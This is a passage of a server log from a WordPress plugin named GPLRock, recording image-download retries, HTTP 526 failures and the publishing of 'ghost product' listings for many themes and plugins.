labomba-responsive-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/labomba---responsive-multipurpose-wordpress-theme-13071.webp [05-Apr-2026 15:11:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: labomba-responsive-multipurpose-wordpress-theme [05-Apr-2026 15:11:14 UTC] GPLRock: Image download failed for product orbius-creative-agency-and-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:17 UTC] GPLRock: Image download failed for product orbius-creative-agency-and-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/orbius---creative-agency-and-portfolio-theme-3418.webp for product orbius-creative-agency-and-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:19 UTC] GPLRock: Image download failed for product orbius-creative-agency-and-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:21 UTC] GPLRock: Image download failed for product orbius-creative-agency-and-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/orbius---creative-agency-and-portfolio-theme-3418.webp for product orbius-creative-agency-and-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:23 UTC] GPLRock WARNING: Image download failed for product orbius-creative-agency-and-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/orbius---creative-agency-and-portfolio-theme-3418.webp [05-Apr-2026 15:11:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: orbius-creative-agency-and-portfolio-theme [05-Apr-2026 15:11:23 UTC] GPLRock: Image download failed for product valiance-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:25 UTC] GPLRock: Image download failed for product valiance-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valiance---business-consulting-wordpress-theme-31943.webp for product valiance-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:27 UTC] GPLRock: Image download failed for product valiance-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:29 UTC] GPLRock: Image download failed for product valiance-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valiance---business-consulting-wordpress-theme-31943.webp for product valiance-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:32 UTC] GPLRock WARNING: Image download failed for product valiance-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/valiance---business-consulting-wordpress-theme-31943.webp [05-Apr-2026 15:11:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: valiance-business-consulting-wordpress-theme [05-Apr-2026 15:11:32 UTC] GPLRock: Image download failed for product wine-maker-winery-wordpress-shop (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:34 UTC] GPLRock: Image download failed for product wine-maker-winery-wordpress-shop (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wine-maker---winery-wordpress-shop-12619.webp for product wine-maker-winery-wordpress-shop after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:36 UTC] GPLRock: Image download failed for product wine-maker-winery-wordpress-shop (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:38 UTC] GPLRock: Image download failed for product wine-maker-winery-wordpress-shop (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wine-maker---winery-wordpress-shop-12619.webp for product wine-maker-winery-wordpress-shop after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:40 UTC] GPLRock WARNING: Image download failed for product wine-maker-winery-wordpress-shop. URL: https://meldwp.com/wp-content/uploads/wine-maker---winery-wordpress-shop-12619.webp [05-Apr-2026 15:11:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wine-maker-winery-wordpress-shop [05-Apr-2026 15:11:40 UTC] GPLRock: Image download failed for product charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:42 UTC] GPLRock: Image download failed for product charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charity-wordpress-theme-15300.webp for product charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:45 UTC] GPLRock: Image download failed for product charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:47 UTC] GPLRock: Image download failed for product charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charity-wordpress-theme-15300.webp for product charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:49 UTC] GPLRock WARNING: Image download failed for product charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/charity-wordpress-theme-15300.webp [05-Apr-2026 15:11:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: charity-wordpress-theme [05-Apr-2026 15:11:49 UTC] GPLRock: Image download failed for product wallcart-wp-multipurpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:51 UTC] GPLRock: Image download failed for product wallcart-wp-multipurpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wallcart-wp---multipurpose-elementor-woocommerce-theme-2006.webp for product wallcart-wp-multipurpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:54 UTC] GPLRock: Image download failed for product wallcart-wp-multipurpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:56 UTC] GPLRock: Image download failed for product wallcart-wp-multipurpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wallcart-wp---multipurpose-elementor-woocommerce-theme-2006.webp for product wallcart-wp-multipurpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:58 UTC] GPLRock WARNING: Image download failed for product wallcart-wp-multipurpose-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/wallcart-wp---multipurpose-elementor-woocommerce-theme-2006.webp [05-Apr-2026 15:11:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wallcart-wp-multipurpose-elementor-woocommerce-theme [05-Apr-2026 15:11:58 UTC] GPLRock: Image download failed for product wapo-vape-tobacco-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:12:00 UTC] GPLRock: Image download failed for product wapo-vape-tobacco-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:12:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wapo---vape--tobacco-wordpress-theme-24541.webp for product wapo-vape-tobacco-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:12:02 UTC] GPLRock: Image download failed for product wapo-vape-tobacco-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:12:04 UTC] GPLRock: Image download failed for product wapo-vape-tobacco-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:12:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wapo---vape--tobacco-wordpress-theme-24541.webp for product wapo-vape-tobacco-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:12:07 UTC] GPLRock WARNING: Image download failed for product wapo-vape-tobacco-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wapo---vape--tobacco-wordpress-theme-24541.webp [05-Apr-2026 15:12:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wapo-vape-tobacco-wordpress-theme [05-Apr-2026 15:12:07 UTC] GPLRock: Image download failed for product resort-hotel-wordpress-theme-erios (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:12:09 UTC] GPLRock: Image download failed for product resort-hotel-wordpress-theme-erios (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:12:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/resort--hotel-wordpress-theme--erios-18212.webp for product resort-hotel-wordpress-theme-erios after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:12:11 UTC] GPLRock: Image download failed for product resort-hotel-wordpress-theme-erios (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:12:13 UTC] GPLRock: Image download failed for product resort-hotel-wordpress-theme-erios (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:12:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/resort--hotel-wordpress-theme--erios-18212.webp for product resort-hotel-wordpress-theme-erios after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:12:15 UTC] GPLRock WARNING: Image download failed for product resort-hotel-wordpress-theme-erios. URL: https://meldwp.com/wp-content/uploads/resort--hotel-wordpress-theme--erios-18212.webp [05-Apr-2026 15:12:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: resort-hotel-wordpress-theme-erios [05-Apr-2026 15:12:53 UTC] GPLRock: Image download failed for product drill-handyman-plumber-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:12:55 UTC] GPLRock: Image download failed for product drill-handyman-plumber-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:12:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/drill---handyman--plumber-services-wordpress-theme-8294.webp for product drill-handyman-plumber-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:12:57 UTC] GPLRock: Image download failed for product drill-handyman-plumber-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:00 UTC] GPLRock: Image download failed for product drill-handyman-plumber-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/drill---handyman--plumber-services-wordpress-theme-8294.webp for product drill-handyman-plumber-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:02 UTC] GPLRock WARNING: Image download failed for product drill-handyman-plumber-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/drill---handyman--plumber-services-wordpress-theme-8294.webp [05-Apr-2026 15:13:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: drill-handyman-plumber-services-wordpress-theme [05-Apr-2026 15:13:03 UTC] GPLRock: Image download failed for product linoor-digital-agency-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:05 UTC] GPLRock: Image download failed for product linoor-digital-agency-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/linoor---digital-agency-services-wordpress-theme-27072.webp for product linoor-digital-agency-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:07 UTC] GPLRock: Image download failed for product linoor-digital-agency-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:09 UTC] GPLRock: Image download failed for product linoor-digital-agency-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/linoor---digital-agency-services-wordpress-theme-27072.webp for product linoor-digital-agency-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:11 UTC] GPLRock WARNING: Image download failed for product linoor-digital-agency-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/linoor---digital-agency-services-wordpress-theme-27072.webp [05-Apr-2026 15:13:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: linoor-digital-agency-services-wordpress-theme [05-Apr-2026 15:13:11 UTC] GPLRock: Image download failed for product escher-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:13 UTC] GPLRock: Image download failed for product escher-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/escher---blog-wordpress-theme-29805.webp for product escher-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:16 UTC] GPLRock: Image download failed for product escher-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:18 UTC] GPLRock: Image download failed for product escher-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/escher---blog-wordpress-theme-29805.webp for product escher-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:20 UTC] GPLRock WARNING: Image download failed for product escher-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/escher---blog-wordpress-theme-29805.webp [05-Apr-2026 15:13:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: escher-blog-wordpress-theme [05-Apr-2026 15:13:20 UTC] GPLRock: Image downloaded successfully for product konzept-fullscreen-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5770b10.webp [05-Apr-2026 15:13:20 UTC] GPLRock: Using pre-downloaded image for product konzept-fullscreen-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5770b10.webp [05-Apr-2026 15:13:20 UTC] GPLRock: Ghost product published with image - Product ID: konzept-fullscreen-portfolio-wordpress-theme [05-Apr-2026 15:13:20 UTC] GPLRock: Image download failed for product barhouse-wooden-house-construction-and-woodworks-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:22 UTC] GPLRock: Image download failed for product barhouse-wooden-house-construction-and-woodworks-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/barhouse---wooden-house-construction-and-woodworks-wordpress-theme-26088.webp for product barhouse-wooden-house-construction-and-woodworks-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:25 UTC] GPLRock: Image download failed for product barhouse-wooden-house-construction-and-woodworks-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:27 UTC] GPLRock: Image download failed for product barhouse-wooden-house-construction-and-woodworks-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/barhouse---wooden-house-construction-and-woodworks-wordpress-theme-26088.webp for product barhouse-wooden-house-construction-and-woodworks-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:29 UTC] GPLRock WARNING: Image download failed for product barhouse-wooden-house-construction-and-woodworks-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/barhouse---wooden-house-construction-and-woodworks-wordpress-theme-26088.webp [05-Apr-2026 15:13:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: barhouse-wooden-house-construction-and-woodworks-wordpress-theme [05-Apr-2026 15:13:29 UTC] GPLRock: Image download failed for product royal-event-catering-wedding-chef-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:31 UTC] GPLRock: Image download failed for product royal-event-catering-wedding-chef-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/royal-event--catering--wedding-chef-wordpress-theme-10025.webp for product royal-event-catering-wedding-chef-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:33 UTC] GPLRock: Image download failed for product royal-event-catering-wedding-chef-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:35 UTC] GPLRock: Image download failed for product royal-event-catering-wedding-chef-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/royal-event--catering--wedding-chef-wordpress-theme-10025.webp for product royal-event-catering-wedding-chef-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:37 UTC] GPLRock WARNING: Image download failed for product royal-event-catering-wedding-chef-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/royal-event--catering--wedding-chef-wordpress-theme-10025.webp [05-Apr-2026 15:13:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: royal-event-catering-wedding-chef-wordpress-theme [05-Apr-2026 15:13:38 UTC] GPLRock: Image downloaded successfully for product walk-responsive-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7ba7f5b.webp [05-Apr-2026 15:13:38 UTC] GPLRock: Using pre-downloaded image for product walk-responsive-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7ba7f5b.webp [05-Apr-2026 15:13:38 UTC] GPLRock: Ghost product published with image - Product ID: walk-responsive-business-wordpress-theme [05-Apr-2026 15:13:38 UTC] GPLRock: Image download failed for product wotahub-coworking-space-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:40 UTC] GPLRock: Image download failed for product wotahub-coworking-space-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wotahub--coworking-space-wordpress-theme-13531.webp for product wotahub-coworking-space-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:42 UTC] GPLRock: Image download failed for product wotahub-coworking-space-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:44 UTC] GPLRock: Image download failed for product wotahub-coworking-space-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wotahub--coworking-space-wordpress-theme-13531.webp for product wotahub-coworking-space-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:46 UTC] GPLRock WARNING: Image download failed for product wotahub-coworking-space-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wotahub--coworking-space-wordpress-theme-13531.webp [05-Apr-2026 15:13:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wotahub-coworking-space-wordpress-theme [05-Apr-2026 15:13:46 UTC] GPLRock: Image downloaded successfully for product opportunity-finance-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-88d52e54.webp [05-Apr-2026 15:13:46 UTC] GPLRock: Using pre-downloaded image for product opportunity-finance-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-88d52e54.webp [05-Apr-2026 15:13:46 UTC] GPLRock: Ghost product published with image - Product ID: opportunity-finance-wordpress-theme [05-Apr-2026 15:13:46 UTC] GPLRock: Image download failed for product yorn-music-video-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:49 UTC] GPLRock: Image download failed for product yorn-music-video-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yorn---music--video-wordpress-theme-9508.webp for product yorn-music-video-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:51 UTC] GPLRock: Image download failed for product yorn-music-video-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:53 UTC] GPLRock: Image download failed for product yorn-music-video-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:13:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yorn---music--video-wordpress-theme-9508.webp for product yorn-music-video-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:13:55 UTC] GPLRock WARNING: Image download failed for product yorn-music-video-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/yorn---music--video-wordpress-theme-9508.webp [05-Apr-2026 15:13:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yorn-music-video-wordpress-theme [05-Apr-2026 15:15:39 UTC] GPLRock: Image downloaded successfully for product easy-social-share-buttons-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a946effc.jpg [05-Apr-2026 15:15:39 UTC] GPLRock: Using pre-downloaded image for product easy-social-share-buttons-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a946effc.jpg [05-Apr-2026 15:15:39 UTC] GPLRock: Ghost product published with image - Product ID: easy-social-share-buttons-for-wordpress [05-Apr-2026 15:15:40 UTC] GPLRock: Image downloaded successfully for product gon-responsive-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2a566e40.jpg [05-Apr-2026 15:15:41 UTC] GPLRock: Using pre-downloaded image for product gon-responsive-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2a566e40.jpg [05-Apr-2026 15:15:41 UTC] GPLRock: Ghost product published with image - Product ID: gon-responsive-multi-purpose-wordpress-theme [05-Apr-2026 15:15:42 UTC] GPLRock: Image downloaded successfully for product x-the-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-23734c07.jpg [05-Apr-2026 15:15:42 UTC] GPLRock: Using pre-downloaded image for product x-the-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-23734c07.jpg [05-Apr-2026 15:15:42 UTC] GPLRock: Ghost product published with image - Product ID: x-the-theme [05-Apr-2026 15:15:43 UTC] GPLRock: Image downloaded successfully for product woocommerce-conditional-shipping-and-payments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7eaf9a3c.jpg [05-Apr-2026 15:15:43 UTC] GPLRock: Using pre-downloaded image for product woocommerce-conditional-shipping-and-payments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7eaf9a3c.jpg [05-Apr-2026 15:15:43 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-conditional-shipping-and-payments [05-Apr-2026 15:15:45 UTC] GPLRock: Image downloaded successfully for product woocommerce-advanced-notifications (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-00cdd100.jpg [05-Apr-2026 15:15:45 UTC] GPLRock: Using pre-downloaded image for product woocommerce-advanced-notifications: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-00cdd100.jpg [05-Apr-2026 15:15:45 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-advanced-notifications [05-Apr-2026 15:15:46 UTC] GPLRock: Image downloaded successfully for product graph-paper-press-sell-media (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-24a46320.jpg [05-Apr-2026 15:15:46 UTC] GPLRock: Using pre-downloaded image for product graph-paper-press-sell-media: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-24a46320.jpg [05-Apr-2026 15:15:46 UTC] GPLRock: Ghost product published with image - Product ID: graph-paper-press-sell-media [05-Apr-2026 15:15:48 UTC] GPLRock: Image downloaded successfully for product australia-post-woocommerce-extension-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62f99a58.jpg [05-Apr-2026 15:15:48 UTC] GPLRock: Using pre-downloaded image for product australia-post-woocommerce-extension-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62f99a58.jpg [05-Apr-2026 15:15:48 UTC] GPLRock: Ghost product published with image - Product ID: australia-post-woocommerce-extension-pro [05-Apr-2026 15:15:50 UTC] GPLRock: Image downloaded successfully for product directory-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7c5fdd5b.jpg [05-Apr-2026 15:15:50 UTC] GPLRock: Using pre-downloaded image for product directory-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7c5fdd5b.jpg [05-Apr-2026 15:15:50 UTC] GPLRock: Ghost product published with image - Product ID: directory-pro [05-Apr-2026 15:15:51 UTC] GPLRock: Image downloaded successfully for product woocommerce-name-your-price (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa58431a.jpg [05-Apr-2026 15:15:51 UTC] GPLRock: Using pre-downloaded image for product woocommerce-name-your-price: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fa58431a.jpg [05-Apr-2026 15:15:51 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-name-your-price [05-Apr-2026 15:15:52 UTC] GPLRock: Image downloaded successfully for product woocommerce-variation-swatches-and-photos (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e0be096.jpg [05-Apr-2026 15:15:53 UTC] GPLRock: Using pre-downloaded image for product woocommerce-variation-swatches-and-photos: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e0be096.jpg [05-Apr-2026 15:15:53 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-variation-swatches-and-photos [05-Apr-2026 15:17:32 UTC] GPLRock: Image downloaded successfully for product clevehouse-smart-home-automation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42e273e6.jpg [05-Apr-2026 15:17:32 UTC] GPLRock: Using pre-downloaded image for product clevehouse-smart-home-automation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42e273e6.jpg [05-Apr-2026 15:17:32 UTC] GPLRock: Ghost product published with image - Product ID: clevehouse-smart-home-automation-elementor-template-kit [05-Apr-2026 15:17:33 UTC] GPLRock: Image downloaded successfully for product chyro-chiropractic-physiotherapy-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7fbb6f52.jpg [05-Apr-2026 15:17:34 UTC] GPLRock: Using pre-downloaded image for product chyro-chiropractic-physiotherapy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7fbb6f52.jpg [05-Apr-2026 15:17:34 UTC] GPLRock: Ghost product published with image - Product ID: chyro-chiropractic-physiotherapy-elementor-template-kit [05-Apr-2026 15:17:35 UTC] GPLRock: Image downloaded successfully for product chemiclab-science-research-laboratory-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-360caf20.jpg [05-Apr-2026 15:17:35 UTC] GPLRock: Using pre-downloaded image for product chemiclab-science-research-laboratory-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-360caf20.jpg [05-Apr-2026 15:17:35 UTC] GPLRock: Ghost product published with image - Product ID: chemiclab-science-research-laboratory-elementor-template-kit [05-Apr-2026 15:17:37 UTC] GPLRock: Image downloaded successfully for product chakta-auto-parts-store-accessories-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6a788708.webp [05-Apr-2026 15:17:37 UTC] GPLRock: Using pre-downloaded image for product chakta-auto-parts-store-accessories-elementor-template-kit: 